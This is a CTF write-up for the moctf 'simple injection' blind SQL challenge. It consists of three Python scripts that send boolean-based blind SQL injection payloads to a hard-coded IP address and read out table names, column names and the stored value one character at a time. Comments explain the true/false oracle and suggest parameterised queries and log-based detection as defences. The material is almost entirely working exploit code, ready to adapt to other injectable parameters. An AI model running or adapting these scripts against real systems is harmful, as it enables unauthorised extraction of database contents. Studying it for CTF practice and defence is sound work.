题目一:moctf 简单注入(盲注)

一、猜表名

import requests
import re
# Boolean-based blind SQL injection against the CTF target: the `id` GET
# parameter is spliced into the server's query unsanitised, and the page
# contains 'Hello' only when the injected condition is true. That one bit is
# used below to read the comma-joined table names of the current database
# (group_concat over information_schema.tables) one character at a time.
# Defender's view: the root cause is string-built SQL; a parameterised query,
# or rejecting a non-numeric `id` before it reaches the database, removes the
# oracle entirely. In access logs a run like this is distinctive: one session,
# 49 * 94 near-identical requests whose query strings differ only in two
# integers and carry ascii(mid(...)) / information_schema / group_concat.
arr=[]          # characters recovered so far, in position order
t=0             # number of recovered characters (always equal to len(arr))
s=requests.session()
# i = 1-based position inside the group_concat result, j = candidate ASCII
# code (32..125). Every candidate is sent for every position -- there is no
# early exit after a hit or when the string ends -- so the request count is
# fixed at 49 * 94 regardless of the result length.
for i in range(1,50):
	for j in range(32,126):
		url= "http://119.23.73.3:5004/?id=1'and(ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),"+str(i)+",1))="+str(j)+")and(1)='1"
		# print(url)
		c=s.get(url)
		# 'Hello' in the body means the injected predicate held, i.e. the
		# character at position i has ASCII code j.
		if 'Hello' in c.text:
			arr.append(chr(j))
			t=t+1
			print(url,end="\n")
			# echo the partial string recovered so far
			for k in range(0,t):
				print(arr[k],end="")
				pass
			print("\n")
			pass
		pass
	pass

二、猜列名

import requests
import re
# Second blind-injection pass: same oracle (the page contains 'Hello' only
# when the injected predicate is true), now reading the comma-joined column
# names of the table found earlier (group_concat over
# information_schema.columns filtered by table_name), one character per hit.
# Defender's view: the fix is server-side -- parameterise the query or reject
# a non-numeric `id` -- and the traffic is easy to alert on: one session
# issuing 49 * 94 requests that differ only in two integers, each carrying
# ascii(mid(...)) and information_schema in the query string.
arr=[]          # characters recovered so far, in position order
t=0             # number of recovered characters (always equal to len(arr))
s=requests.session()
# i = 1-based position in the group_concat result, j = candidate ASCII code.
# No early exit: every candidate is tested for every position.
for i in range(1,50):
	for j in range(32,126):
		url= "http://119.23.73.3:5004/?id=1'and(ascii(mid((select(group_concat(column_name))from(information_schema.columns)where(table_name='do_y0u_l1ke_long_t4ble_name')),"+str(i)+",1))="+str(j)+")and(1)='1"
		# print(url)
		c=s.get(url)
		# 'Hello' in the body means the character at position i has ASCII code j.
		if 'Hello' in c.text:
			arr.append(chr(j))
			t=t+1
			print(url,end="\n")
			# echo the partial string recovered so far
			for k in range(0,t):
				print(arr[k],end="")
				pass
			print("\n")
			pass
		pass
	pass

三、猜数据

import requests
import re
# Third blind-injection pass: the same 'Hello' oracle is used to read the
# value selected from the named column of the named table, one character at
# a time (no group_concat here -- the subquery is presumably expected to
# yield a single value; confirm against the challenge schema).
# Defender's view: this stage is where data actually leaves the database, so
# it is the one most worth detecting -- a single session sending 49 * 94
# requests whose query strings differ only in two integers and contain
# ascii(mid(...)). The server-side fix (parameterised query, or rejecting a
# non-numeric `id`) stops all three stages at once.
arr=[]          # characters recovered so far, in position order
t=0             # number of recovered characters (always equal to len(arr))
s=requests.session()
# i = 1-based position in the selected value, j = candidate ASCII code.
# No early exit: every candidate is tested for every position.
for i in range(1,50):
	for j in range(32,126):
		url= "http://119.23.73.3:5004/?id=1'and(ascii(mid((select(d0_you_als0_l1ke_very_long_column_name)from(do_y0u_l1ke_long_t4ble_name)),"+str(i)+",1))="+str(j)+")and(1)='1"
		# print(url)
		c=s.get(url)
		# 'Hello' in the body means the character at position i has ASCII code j.
		if 'Hello' in c.text:
			arr.append(chr(j))
			t=t+1
			print(url,end="\n")
			# echo the partial string recovered so far
			for k in range(0,t):
				print(arr[k],end="")
				pass
			print("\n")
			pass
		pass
	pass